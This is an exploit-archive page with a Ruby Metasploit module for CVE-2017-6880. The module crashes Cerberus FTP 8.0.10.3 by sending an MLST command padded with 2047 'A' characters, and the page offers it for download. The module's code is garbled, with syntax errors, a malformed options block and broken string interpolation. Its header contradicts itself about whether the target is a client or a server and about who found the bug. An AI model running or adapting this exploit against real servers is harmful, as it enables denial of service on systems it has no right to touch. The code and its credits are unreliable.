Cerberus FTP 8.0.10.3 MLST Buffer Overflow

Cerberus FTP 8.0.10.3 MLST Buffer Overflow: Posted May 15, 2017; Authored by Souhardya Sardar | Site metasploit.com; This Metasploit module exploits a buffer overflow in the Cerberus FTP client version 8.0.10.3 that is triggered by sending a bad char "A" in the command "MLST".; tags | exploit, overflow; advisories | CVE-2017-6880; SHA-256 | f6b505ea1428a3f5f93df139b72623113999eac71ef627594621b4e58ddbd048; Download | Favorite | View

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

#!/usr/share/ruby

#[+] Title: Cerberus FTP Server 8.0.10.3 a 'MLST' Remote Buffer Overflow
#[+] Credits / Discovery: Nassim Asrir
#[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
#[+] Metasploit Module Author : Souhardya Sardar 
#[+] Metasploit Module Author Contact: github.com/Souhardya | Souhardya.sardar@protonmail.com
#[+] Author Company: Henceforth
#[+] CVE: CVE-2017-6880

#Vendor:
#===============
# 
#https://www.cerberusftp.com/
 
 
#Download:
#===========
# 
#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
 
 
#Vulnerability Type:
#===================
# 
#Remote Buffer Overflow.



# ----------------------------
# Module Dependencies/requires
# ----------------------------

require 'msf/core'

# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 
 include Msf::Exploit::Remote::Ftp

# -----------------------------------------
# Initialize information
# -----------------------------------------
 
 def initialize(info = {})
 super(update_info(info, 
 'Name' => 'Cerber FTP Remote Buffer Overflow ',
 'Description' => %q{
 This module exploits a buffer overflow in the Cerber FTP client that is triggered
 by sending a bad char "A" in the command "MLST" (2047) .
 },
 
 'Author' =>
 [
 'Module Author And Bug Discovered by : Peter Baris', 
 'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :)
 'Thanks to : Nidhish Pandya ', #auditing:)
 
 
 ],
 'License' => NONE,
 'Platform' => ['win']
 
 'References' =>
 [
 [ 'CVE', 'CVE-2017-6880' ],
 [ Reference code taken from original POC located here :- https://www.exploit-db.com/exploits/41620/ ] 
 
 ]))
 
 register_optionsOptPort.new('SRVPORT', [true, "The remote FTP server port", 21])
 ], self.class)
 deregister_options('FTPUSER', 'FTPPASS')
 end

 def exploit
 connect
 
 payload = "A"*2047
 
 print_status("Trying to connect to target server {target.name...")

 
 sock.put('MLST ' + payload + '\r\n')
 
 handler
 disconnect
 end
 
end

Top Authors In Last 30 Days

Red Hat 247 files
Ubuntu 96 files
indoushka 49 files
Jasper Nota 25 files
Gentoo 19 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Debian 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,085)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,603)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,440)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,724)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

Share This

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems